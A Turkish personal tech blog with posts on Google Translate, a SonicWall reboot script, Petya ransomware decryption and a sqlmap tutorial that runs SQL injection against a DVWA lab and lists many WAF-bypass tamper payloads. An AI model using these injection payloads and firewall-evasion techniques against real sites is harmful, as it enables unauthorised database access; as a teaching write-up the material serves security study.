Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

16 Kasım 2016 Çarşamba

Ve Bir Dönemin Sonu: Saçma Sapan Google Translate Çevirileri Bitiyor!


Ve Bir Dönemin Sonu: Saçma Sapan Google Translate Çevirileri Bitiyor!

Londra’da gerçekleştirilen Google Story etkinliğinde konuşan Google’ın CEO’su Sundar Pichai, çeviri sistemleri hakkındaki yeniliklerle ilgili açıklamalarda bulundu.
Londra’daki Google Story etkinliğinde çeviri sistemleri hakkındaki yeniliklerden bahseden Google CEO’su Sundar Pichai, kelime kelime çeviri yapması nedeniyle Google Translate’ten doğru sonuçlar alamamaktan yakınan kullanıcıları sevindirecek bir gelişmeyi aktardı. Birkaç yıldır üzerinde çalıştıkları Neural (Nöral) Makine Çevirisi’nin heyecan verici sonuçlara imza attığını söyleyen Pichai, 
Nöral sistem, bütün cümleleri birer birer çevirmek yerine bir defada çevirerek bu kapsamlı içeriği, en yakın çeviriyi bulabilmek için uygun bir dilbilgisi ile insan konuşmasına benzer şekilde yeniden ayarlıyor.
Böylece her cümleyi anlamak daha kolay olduğundan çevrilmiş paragraflar ve makalelerin okunması çok daha kolay hale geliyor. Nöral Makine Çevirisi uçtan uca öğrenme sistemi ile sürekli kendini yenileyerek daha doğal çevirilerin yapılmasını mümkün hale getiriyor” ifadelerini kullandı.
Yeni sistemin çeviriyi edebiyat çevirisi gibi yapacağını söyleyen Pichai, Nöral Makine Çevirisi’nin İngilizce, Fransızca, Almanca, İspanyolca, Portekizce, Çince, Japonca, Korece ve Türkçe olmak üzere toplam 8 dil için aktif hale getirildiğini, hedeflerinin bu dil sayısını 103’e çıkarmak olduğunu belirtti.
Türkiye’nin kendileri için çok önemli olduğunu söyleyen Pichai, 2015 yılında Google Translate’te Arapça’dan Almanca’ya çevirinin toplam diller içerisinde en çok patlamayı yaptığına dikkat çekerek, çeviri sistemlerinin özellikle göçmenlerin işine çok yaradığını söyledi.
Kaynak: Webtekno

15 Eylül 2016 Perşembe

Qnap İçin Plex Media Server Sorununun Çözümü


Qnap güncellemesi yaptıysanız maalesef Plex Media Server desteğini vermediğini göreceksiniz. Bu durumda sorunu çözmek adına destek verilen eski bir sürümün linki https://downloads.plex.tv/plex-media-server/0.9.16.2.1827-df572f6/PlexMediaServer_0.9.16.2.1827-df572f6_arm-x19.qpkg 'dir. Bu linkten indirip elle kurulum yapabilirsiniz.

24 Ağustos 2016 Çarşamba

Architecture of Radio



Günümüzde biz fark etmesek de etrafımız sinyallerle dolu. Gözümüzün algılayamadığı bu sinyaller, baz istasyonlarından, yönlendiricilerden, modemlerden ya da uydulardan geliyor olabilirler. Artık herkesin evinde olan kablosuz ağların sinyalleri gözlerimiz tarafından görülseydi nasıl olurdu? The Architecture of Radio'dan Hollandalı sanatçı Richard Vijgen, bunu düşünmüş ve bununla ilgili bir konsept video hazırlamış.

Hayatımızın önemli bir kısmı, baz istasyonlarından, router'larımızdan, uydulardan ve fazlasından gelen görünmez sinyallere dayanıyor. Görmediğimiz bu gizli dünyayı çok tanımıyoruz, ancak Hollandalı sanatçı Richard Vijgen'ın çalışması, sinyalleri beynimizin kavrayabileceği grafiklere dönüştürüyor.

Vijgen, çalıştığı stüdyonun web sitesinde "erişim noktaları, baz istasyonları ve uyduların oluşturduğu veri kabloları ve sinyallerle tamamen sarılmış durumdayız" diyor. Sanatçının The Architecture of Radio adındaki yeni uygulaması, belirli bir konum için farklı veri kaynaklarından faydalanarak, topladığı bilgileri görselleştiriyor.

Creative Application'ın veri topladığı kaynaklar arasında NASA'nın Jet Propulsion laboratuvarının uydu konumu sistemi Ephemeris, baz istasyonlarının konumlarını toplayarak paylaşan açık harita OpenCellID var. Toplanan bu veriler, hoş görünümlü, artırılmış gerçeklik stiline sahip bir arayüzde gösteriliyor. Arayüz, cihazınızı döndürerek etrafınızdaki sinyalleri görmenize ve tecrübe etmenize olanak tanıyor.

Aynı fikre sahip konseptlere daha önce de rastlamıştık, ancak önceki çalışmalar yalnızca tek tür iletişime (örneğin yalnızca Wi-Fi'a) odaklanıyordu. Etrafımızdaki cihazların ve sistemlerin bu gözle görünmeyen dalgalara dayandığını görmek, gerçekten de ilginç.




Architecture of Radio, Android işletim sistemine sahip tablet ve telefonlar için geliştirilmiş bir sinyal izleme aracıdır. Uygulama ile bulunduğunuz alandaki sinyalleri ve veri dalgalarını izleyebilirsiniz.
Sahip olduğumuz mobil cihazların neredeyse hepsi Wİ-Fİ sinyallerini kullanıyor ve durum böyle olunca etrafımızda görünmez bir sinyal duvarı oluşuyor. Çıplak göz ile göremediğimiz bu sinyallerin neye benzediğini merak ediyorsanız bu uygulama sayesinde merakınızı dindirebilirsiniz. Baz istasyonu kuleleri, GPS uyduları ve yönlendiriciler tarafından yayılan sinyallerin görmenize olanak sağlayan uygulama içerisine girdiğimiz dünyanın gerçek boyutunu bize gösteriyor. 

Architecture of Radio uygulaması bir ölçüm aracı değildir. Uygulama ile etrafınızda yayılan sinyalleri görebilirsiniz. Uygulama çevrenizde yer alan sinyalleri 360 derece görselleştirme yaparak çalışıyor. 7 milyon baz istasyonu, 19 milyon Wİ-Fİ yönlendirici ve yüzlerce uydu verisini bünyesinde barındıran uygulama ile neredeyse hiç sinyal kaçırmayacaksınız. 

Architecture of Radio uygulamasını Android işletim sistemine sahip tablet ve telefonlarınıza 6.36 TL ödeyerek indirebilirsiniz.

Bu arada uygulamayı android telefonumda denedim ve müthiş çalışıyor. Etrafımızı saran sinyalleri görseniz evde wireless kullanmam zararlı diyemezsiniz :(

6 Ağustos 2016 Cumartesi

D&R Sorumsuzluğu ve İlgisizliği

Hepimizin bir şekilde yolu D&R adlı mağazaya düşmüştür. Hele kitap okuyorsanız. Ancak birçok kişinin şahit olduğu saçmalıkları da bulunuyor. Mesela web sayfasındaki ürün ile mağazada satılan ürün arasında fark var. Web sitesinden alıyorsanız daha ucuz mağazadan alıyorsanız daha fazla para ödüyorsunuz. Bunlar aslında çok ta önemsenmiyor ancak iş web sitelerinden ürün almaya gelince yada kitap dışında bir ürünü mağazadan almaya gelince ciddi sorunlarla karşılaşıyorsunuz. 
Maalesef ikinci defadır aynı hataya düşüp alım yaptım.

İlk olay mağazadan alınan ürünü parasını ödemeden kontrol ettirmemeleri ile başladı. Parasını ödeyince kutuyu açıp ürünü denediğimde ürün hatalı çıktı. Akabinde servise gidip düzenlenecek belge ile değişim olacağı söylendi. Buraya kadar herşey normal ama giden ürün sözleşmede belirtilen sürede kontrol edilmeyip sallandı. Telefonlar ve uyarıları bile umursamadılar sanırım. 5 gün daha taktıktan sonra lütfedip ürünü gönderdiler.

İkinci olay ise daha sıkıntılı oldu. Salı sabahı web sitesinde siparişini verdiğim ürün mesafeli satış sözleşmesinde yazılan 5 günü içinde kargoya verilmesi şartına rağmen 5. günde de kargoya verilmedi. Telefonlarla aramalarda ürünün ellerinde olduğunu ama kargolanmadığı bilgisi 3 kere tekrarlandı. Yani alıcı adamların umrunda bile değil. Yaptığı sözleşmeye kendisi bile inanıyor mu bilemem. 

Bundan sonra değil web sitesinden ürün almak mağazasının yolundan bile geçilmemesi gerektiğini anlamış bulunuyorum. Bence bu kişilerden ürün alırken 2 kere düşünmek gerekiyor.

14 Temmuz 2016 Perşembe

Sonicwall 9800 Automated Reboot Script

Eğer Sonicwall Firewall'larından birini kullanıyorsanız ve belirli zamanlarda reboot edilmesini istiyorsanız aşağıdaki script işinize yarayabilir.

Öncelikle C:\Windows\System32 dizini altına Putty.exe dosyasını indirip kaydediyorsunuz. Daha sonra aşağıda verdiğim scripti notepad ile sonicwallrestart.vbs adı altında C:\Windows\System32 dizini altına kaydediyorsunuz.

Script:

@if (@CodeSection == @Batch) @then

@echo on
set SendKeys=CScript //nologo //E:JScript "%~F0"

start \putty -ssh admin@sonicwall_ip_adresi

%SendKeys% "Sonicwall_kullanıcı_şifrenizi_girin{ENTER}"
TIMEOUT /T 2
%SendKeys% "restart{ENTER}"
TIMEOUT /T 2
%SendKeys% "y{ENTER}"

pause
@end

WScript.CreateObject("WScript.Shell").SendKeys(WScript.Arguments(0));

Tüm bu işlemlerden sonra windows makinanızda zamanlanmış görev oluşturup restart zamanı ve tekrar sıklığını ayarlıyorsunuz ve işlem tamam. Umarım birilerine faydalı olur.

25 Mayıs 2016 Çarşamba

Sqlmap ile Firewall Atlatma Teknikleri

Hedef sistemde SQL Injection güvenlik açığı tespit edilse bile normal şartlarda sqli komutları işlem görmüyorsa büyük ihtimalle arkada bir WAF(Web Application Firewall) tarafından algılanıp engelleniyordur.

SQL Injection saldırılarında çeşitli bypass yöntemleri kullanırız, örneğin;
büyük küçük harf karmaşası, komutların çeşitli şifreleme algoritmalarıyla encode etmek gibi..

SQLmap'in WAF, IPS gibi saldırı engelleme sistemlerini bypass etmesi için "tamper script" özelliği bulunmaktadır.

Aşağıda WAF kullanan bir sisteme SQLmap'in default kullanım parametresi verilmiştir ve sonuç alınamamıştır:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --dbs 
    sqlmap/1.0-dev-dea6218 - automatic SQL injection and database takeover tool
    http://sqlmap.org 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:39:43
[15:39:43] [INFO] testing connection to the target url
[15:39:43] [INFO] heuristics detected web page charset 'ascii'
[15:39:43] [WARNING] reflective value(s) found and filtering out
[15:39:43] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[15:39:43] [INFO] testing for SQL injection on GET parameter 'id'
[15:39:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:39:43] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:44] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:45] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:46] [CRITICAL] unable to connect to the target url or proxy
[15:39:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:47] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:48] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request

Görüldüğü gibi hedef sistemde UNION komutu geçtiğinde istekleri engelleyen bir yapı bulunmaktadır..

Şimdi ise bir de SQLmap'i --tamper fonksiyonuyla birlikte kullanalım:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "tamper/randomcase.py" --dbs 
[*] starting at 16:16:24 
[16:16:24] [INFO] loading tamper script 'randomcase'
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter 'id' is dynamic
[16:16:26] [WARNING] GET parameter 'id' appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset 'ascii'
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter 'id'
[16:16:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Surname: admin')
[16:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:16:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:16:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..                                            
[16:16:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:16:37] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3106=3106&Submit=Submit
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit
---
[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:
[*] beyazsapka
[*] dvwa
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.127'
[*] shutting down at 16:16:41

Görüldüğü gibi hedef sistemdeki koruyucu mekanizma atlatılmış oldu..

SQLmap'in yüklü olduğu dizinde "tamper" isimli klasörde çeşitli bypass scriptleri bulunmaktadır. Biz yukardaki testte "tamper" klasörünün içinde "randomcase.py" scriptinden faydalandık. Bu scriptin görevi UNION gibi sql komutlarını rastgele büyük-küçük harf şeklinde düzenleyerek karşı sisteme yollar ve WAF var ise bypass etmiş olur.

Aşağıda tamper klasöründe bulunan diğer bypass scriptlerinin isimleri, bypass yöntemleri ve hangi veritabanı platformlarında işlevi olduğunu paylaştım:


apostrophemask.py (UTF-8)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu:  AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

apostrophenullencode.py (unicode)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu:  AND %271%27=%271%27

appendnullbyte.py ()
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu:  AND 1=1
Platform:
* Microsoft Access

base64encode.py (base64)
Örnek:
* Orjinal Komut: 1' AND SLEEP(5)#
* Bypass Komutu:  MScgQU5EIFNMRUVQKDUpIw==

between.py (“not between” “>”)
Örnek:
* Orjinal Komut: 'A > B'
* Bypass Komutu:  'A NOT BETWEEN 0 AND B'

bluecoat.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu:  SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS

chardoubleencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu:  %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

charencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

charunicodeencode.py
Örnek:
* Orjinal Komut: SELECT FIELD%20FROM TABLE
* Bypass Komutu:  %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET

equaltolike.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT * FROM users WHERE id=1
* Bypass Komutu:  SELECT * FROM users WHERE id LIKE 1

halfversionedmorekeywords.py
Örnek:
* Orjinal Komut: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Komutu:  value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1

ifnull2ifisnull.py (“IF(ISNULL(A), B, A)” “IFNULL(A, B)”)
Örnek:
* Orjinal Komut: IFNULL(1, 2)
* Bypass Komutu:  IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)

modsecurityversioned.py
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu:  1 /*!30000AND 2>1*/--
Platform:
* MySQL

modsecurityzeroversioned.py (“0000”)
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu:  1 /*!00000AND 2>1*/--
Platform:
* MySQL

multiplespaces.py
Örnek:
* Orjinal Komut: UNION SELECT
* Bypass Komutu:   UNION   SELECT

nonrecursivereplacement.py
Örnek:
* Orjinal Komut: 1 UNION SELECT 2--
* Bypass Komutu:  1 UNUNIONION SELSELECTECT 2--

percentage.py (“%”)
Örnek:
* Orjinal Komut: SELECT FIELD FROM TABLE
* Bypass Komutu:  %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP

randomcase.py
Örnek:
* Orjinal Komut: INSERT
* Bypass Komutu:  InsERt

randomcomments.py
Örnek:
'INSERT' becomes 'IN/**/S/**/ERT'

securesphere.py
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu:  AND 1=1 and '0having'='0having'

sp_password.py (“sp_password”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227--
* Bypass Komutu:  1 AND 9227=9227--sp_password
Platform:
* MSSQL

space2comment.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT/**/id/**/FROM/**/users

space2dash.py (“--”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite

space2hash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL

space2morehash.py
Platform:
* MySQL >= 5.1.13

space2mssqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server

space2mssqlhash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1%23%0A9227=9227
Platform:
* MSSQL
* MySQL

space2mysqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL

space2mysqldash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL

space2plus.py (“+”)
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT+id+FROM+users

space2randomblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECTridtFROMnusers

unionalltounion.py (“union all” “union”)
Örnek:
* Orjinal Komut: -1 UNION ALL SELECT
* Bypass Komutu:  -1 UNION SELECT

unmagicquotes.py (“%bf%27” “--”)
Örnek:
* Orjinal Komut: 1' AND 1=1
* Bypass Komutu:  1%bf%27 AND 1=1--%20

versionedkeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL

versionedmorekeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Komutu:  1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13
Kaynak: İsmail Saygılı

4 Mayıs 2016 Çarşamba

Youtube'un Yeni Material Design'ı Nasıl Kullanılır?


Son günlerde teknoloji bloglarında Youtube tasarımının değişeceği hakkında bilgiler veriliyor. Peki bu yeni material design nasıl kullanılır? Bunun için aşağıdaki yöntemi izlemeniz yeterli.

1. Youtube sayfasını Google Chrome'da açıyoruz. www.youtube.com/?gl=US
2. Browser'ın Geliştirici ayarlarını CONTROL + SHIFT + I tuş kombinasyonu ile açın.
3. Açılan geliştirici penceresinde Resources sekmesinde bulunan Cookies kısmına tıklıyoruz. Buradaki youtube.com domainine tıklıyoruz. sağda çıkan VISITOR_INFO1_LIVE değerini siliyoruz. 
4. Daha sonra Console sekmesine geliyoruz ve aşağıdaki kodu kopyalayıp yapıştırıyoruz. Ardından entera basıyoruz.
document.cookie="VISITOR_INFO1_LIVE=Qa1hUZu3gtk;path=/;domain=.youtube.com";
5. Developer toolsu kapatın ve youtube sayfasını yenileyin yeni görünümü karşınızda :)

Sitelerin Adblock Eklentisi Kullanımını Engellemesini Aşma Yöntemi.


Son günlerde birçok site reklam gösterimlerini engelleyen yazılımları "Adblock Killer" kullanmaya başladı. Bu da iğrenç bir hal aldı. Eğer reklamsız site görüntülemesi istiyorsanız para karşılığında bu işi yapmalısınız diyen gazetelerimiz bile var. Ancak bu adblock algılayan siteleri atlatıp siteleri görüntülemenin de bir yolu var. Çok basit bir bir eklenti yaprdımıyla bu sitelerin reklamsız görüntülenmesini sağlayabilirsiniz.

1. Bunun için öncelikle Tampermonkey adlı chrome yada firefox eklentisini kurmanız gerekli. Bu işlemi yapmak için eklentiyi chrome browserdan uygulama mağazasından edinebilirsiniz.

2. Sıra scriptimizin kurulumuna geldik. Bu işlemi anti adblock killer adresine girerek başlatabilirsiniz. Sayfaya girdiğiniz zaman Install ve Cancel isimli iki buton hemen dikkatinizi çekecektir. Install butonuna tıklayıp sonrasında adblock kullanımını engelleyen siteye girdiğiniz zaman artık sitenin rahatça görüntülenebildiğini ve reklamların da ortadan kalmış olduğunu görebileceksiniz.

13 Nisan 2016 Çarşamba

Petya ransomware şifresi çözümlendi

Petya'nın şifresini kırma
Günümüzde genellikle Windows işletim sistemlerini hedef alan birden fazla fidyeci truva atları (Ransomware) vardır. En çok bilinen türü CryptoLocker truva atıdır. CryptoLocker ilk olarak 2013 yılında ortaya çıkmış ve E-Mail eklerinden bilgisayarlara bulaşarak bilgisayarımızın depolama aygıtı olan Hard Disk üzerindeki belirli dosya ve verileri şifreleyerek kullanıcıların bu dosyalara erişimini engellemektedir. Şifrenin çözümlenmesi için ise kullanıcıdan para talep edilmektedir.
Yaklaşık iki hafta kadar önce özellikle Almanya’da baş gösteren Petya isimli yeni bir Ransomware türemiştir. Diğer truva atlarına kıyasla Petya çok daha tehlikelidir. Bunun sebebi Petya’ nın bilgisayardaki belirli dosyalar yerine direkt olarak Master Boot Record’ u hedef almasıdır. Master Boot Record(kısaca MBR) depolama aygıtımız olan Hard Disk’ in ilk sektörüdür. Bilgisayarda hangi verinin/bilginin nerede olduğu burada saklıdır. Virüsü üreten kişler tarafından yapılan açıklamaya göre şifreleme Advanced Encryption Standard(AES) 256 Bit ve RSA 4096 Bit ile gerçekleştirilmiş ve bu yüzden verileri kurtarmanın tek yolunun şifrenin para karşılığında satın alınması olduğunu söylemişlerdi. Ancak uzmanlar Petya’ nın ürettiği şifreyi kırabilmek için Petya üzerinde çalışmalar başlatmış ve geçtiğimiz günlerde çalışmalar başarı ile sonuçlanmıştır.
Petya’nın şifresini kırma:
Petya virüsüne maruz kalmış bir bilgisayar ilk açıldığı anda kullanıcı yukarıdaki ekranla karşılaşır.
Petya’ nın ürettiği şifreyi kırabilmemiz için ihtiyacımız olan şey Petya’ nın ürettiği şifreyi hesaplayabilen bir internet sitesi (petya-pay-no-ransom-mirror1.herokuapp.com) ve Windows kurtarma CD’ si (eğer böyle bir CD oluşturmadıysanız Microsoft’ un kendi sitesinden ücretsiz olarak indirilebilirsiniz).
İnternet sitesi Petya virüsü bulaşmış Hard Diskimizin bazı bilgilerine ihtiyaç duymakta. Bu bilgileri elde etmenin iki farklı yolu vardır. İlki çok zahmetli bir yöntemdir. Bunun için internet üzerinden bir Hex-Editor programı indirerek ihtiyacımız olan tüm bilgileri okumaktır. Diğer yöntem ise güvenlik araştırmacısı olan Fabian Wosar’ ın bu amaç için ürettiği programı kullanmak. Program ücretisiz olup download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip linkinden indirilebilir. Bazı antivirüs programları bu programı tehdit olarak algılayabilir ancak program tamamen zararsızdır.
İlk adımda kurtarma CD’ sini ve yukarıdaki linkten indirmiş olduğunuz programı kopyaladığınız USB Belleği Petya virüsü bulaşmış bilgisayara takıyoruz ve bilgisayarı yeniden başlatıyoruz.

Karşınıza çıkan bu ekranda İleri seçeneğini seçiyoruz. Bu kısımda

bilgisayar onarma seçeneklerini seçiyoruz ve ardından gelişmiş ayarları seçiyoruz.

Son olarak buradan cmd’ yi çalıştır seçeneğini seçiyoruz.

Bu adımda USB belleğimizin hangi harf ile tanımlandığını bulmamız gerek. Bunun için açılan cmd ekranına notepad yazıyoruz ve ENTER tuşuna basıyoruz. Notepad programını açıktan sonra üst menüden Dosya -> Aç seçeneğini seçiyoruz ve karşımıza çıkan ekrandan USB belleğimizin hangi harf ile tanımlandığına bakıyoruz (burada F harfi ile tanımlanmış).

USB belleğimizin hangi harf ile tanımlandığını bulduktan sonra CMD ekranına USB belleğimizin harfi: (burada f:) komutunu girerek bilgisayarımızı USB belleğe yönlendiriyoruz ve ardından PetyaExtractor.exe komutunu girerek indirmiş olduğumuz programı çalıştırıyoruz.

Programı çalıştırdıktan sonra copy sector butonuna basıp otomatik olarak kopyalanan yazıyı notepad’ e yapıştırıyoruz. Ardından Copy Nonce butonuna basarak işlemi tekrarlıyoruz ve oluşturmuş olduğumuz bu dosyayı USB belleğimize kaydediyoruz.

İkinci bir bilgisayardan linkini vermiş olduğum internet sitesine giriyoruz ve oluşturmuş olduğumuz notepad dosyasının içerisindeki bilgileri bu siteye veriyoruz. İlk kutunun içerisine kopyaladığımız ilk bilgileri ikincisine ise ikini kopyaladığımız bilgiyi yapıştırıp submit butonuna basıyoruz.

Birkaç saniye bekledikten sonra ihtiyaç duyduğumuz şifre site tarafından hesaplanmış olacaktır.

Kaynaklar:
Tüm resimler SemperVideo kanalındaki “Krypto-Trojaner Petya entschlüsselt” videosundan alınmıştır. Videonun linki:



Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites